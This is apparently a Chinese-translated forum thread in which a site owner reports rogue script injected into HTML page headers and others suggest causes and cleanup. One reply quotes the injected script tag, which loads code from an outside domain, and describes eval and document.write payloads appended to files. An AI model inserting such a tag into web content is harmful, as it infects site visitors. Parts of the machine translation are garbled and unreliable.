我发现我的HTML页面标题中包含了流氓代码——它是如何出现的,我该如何阻止它?

我的网站也受到了同样的攻击 <script src=http://mylocksmithusa.com/sitebuilder/acura2002.php></script> . 在我检查它之后,显然几乎我所有的.js文件都附加了 document.write([the script above]) <body> 标记(然后删除了文件中的最后几行),并且在我的站点中的几个.php文件的开头添加了eval([超长代码])。

清理完文件后,昨天我更改了ftp密码,今天网站不再被黑客攻击(以前,每隔几个小时文件就会被更改一次)。所以我怀疑有蠕虫或者别的什么东西已经访问了你的ftp。你可以做的是更改ftp密码,让你的网站暂时离线,直到你清理了文件。

看起来您是SQL注入攻击的受害者,或者信任来自查询字符串的未初始化输入。

和 在更改密码之前,您用于连接到它的恶意软件的任何客户端(最好改为SFTP;2009年,任何人都不应该继续使用FTP。)

不要因为你运行的是杀毒软件就认为你的机器没有被感染。今天的AVs是可悲的,绝望的背后的恶意软件作家。接受多种意见,如果AV发现任何问题,不要相信它能解决问题,因为它很可能会失败,可能会留下感染。而是重新安装操作系统。

你问我们有人是如何打开你的网站的,唯一诚实的回答是“我们不知道”。

很可能 您是否安装了wordpress或某些Web应用程序的已知易受攻击的旧版本,并且有一个漫游蠕虫发现并利用了它。